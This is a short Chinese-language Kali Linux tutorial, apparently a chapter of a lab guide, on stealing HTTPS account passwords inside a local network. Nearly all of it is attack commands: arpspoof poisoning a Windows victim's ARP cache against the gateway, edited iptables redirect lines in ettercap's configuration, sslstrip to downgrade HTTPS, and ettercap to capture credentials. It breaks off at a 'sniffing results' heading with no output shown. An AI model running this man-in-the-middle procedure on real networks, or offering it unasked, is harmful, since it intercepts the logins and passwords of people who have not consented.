kali攻防第5章 内网称霸之HTTPS账号密码获取

内网称霸之HTTPS账号密码获取

 

准备工具

1）KALI LINUX系统IP 10.10.10.131

2）WINDOWS 系统 IP 10.10.10.129

3）Arpspoof 嗅探工具

4）Sslstrip https的链接

5）ettercap抓包工具

 

 

 

步骤：

 

1、root@kali:~# arpspoof -i eth0 -t 10.10.10.129 10.10.10.2

2、更改Sslstrip 配置文件

 vim  /etc/ettercap/etter.conf

# if you use iptables:

   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

将这两行的注释去掉如下：

# if you use iptables:

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

 

3、root@kali:~# sslstrip -a -f -k

4、root@kali:~# ettercap -Tq -i eth0

 

嗅探结果：